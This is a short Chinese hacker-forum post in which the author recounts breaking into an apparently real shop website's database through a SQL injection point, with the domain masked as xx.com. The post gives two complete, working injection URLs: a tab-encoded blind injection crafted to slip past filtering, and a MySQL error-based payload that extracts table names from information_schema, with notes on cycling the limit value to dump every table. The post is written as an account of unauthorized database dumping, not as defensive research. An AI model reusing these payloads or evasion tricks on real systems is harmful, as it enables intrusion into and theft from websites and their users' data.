话说某脱裤的黑客被一个注入点弄得蛋疼了,详情请见 http://t00ls.net/thread-14032-1-1.html。 在t00ls发了个帖子,对于这些过滤啥,防火墙啥的,小菜我不懂啊,咱准备等其他黑客回答,然后学习学习,突然我帖子里看到精逼两个字,小菜我眼睛都直了,于是不自量力来折腾折腾.
话说咱菜啊,咱碰到注入点没啥办法,咱能力不行,咱就用工具,正如某岛国爱情动作片里一下,拿起工具,干之,于是就掏出了穿山甲,看看是否能射进去。咱用起穿山甲,咱就sb了,明明是个点,啥都跑不出来哇。
咱思考思考。稍微手工了一下,咱就明白了
这就明白了吧 换季的时候皮肤管理这就是关键字, 于是我在穿山甲的关键字中填写,得出了一些信息, linux的服务器,mysql,等等,可惜在跑表的时候又蛋疼了!发现跑出的表残缺不全。
可总能跑出点东西,于是我就抓了一下包,参考一下穿山甲的注入语句,以换季的时候皮肤管理关键字进行判断进行盲住!
http://xx.com/shop/board/view.php?id=pnotes&no=33%09and%09(select%09char_length(table_name)%09from%09(select%09*%09from%09(select%09*%09from%09information_schema.tables%09where%09table_schema=0x706f6975323538305f676f646f5f636e%09order%09by%09table_schema%09limit%0941,1)%09t%09order%09by%09table_schema%09desc)t%09limit%091)%3E8%09and%091=1
咱就准备一个个的猜,直到猜出表。可咱就想,这累啊,咱写个文章用着笨办法该不会被吐司的黑客踩死啊,咱就蹦跶蹦跶的被关进小黑屋了,咱就问黑客,询牛人,查手册,翻资料,构造了一条语句,终于才偶的大牛朋友 jsbug的博客里找到了一条语句!http://hi.baidu.com/jsbug/blog/item/4602a12c329165351e308943.html 这条语句可以使mysql报错,于是我构造了一下
http://xx.com/shop/board/view.php?id=pnotes&no=33%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,Hex(cast(table_name%20as%20char)),0x27,0x7e)%20FROM%20information_schema.tables%20Where%20table_schema=0x706F6975323538305F676F646F5F636E%20limit%201,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
通过报错得到了key,也就是表。'67645F62645F6D656574696E67'~1': key 'group_key' ,通过解密得到正确的表名。
修改limit的值,就得到所有的表
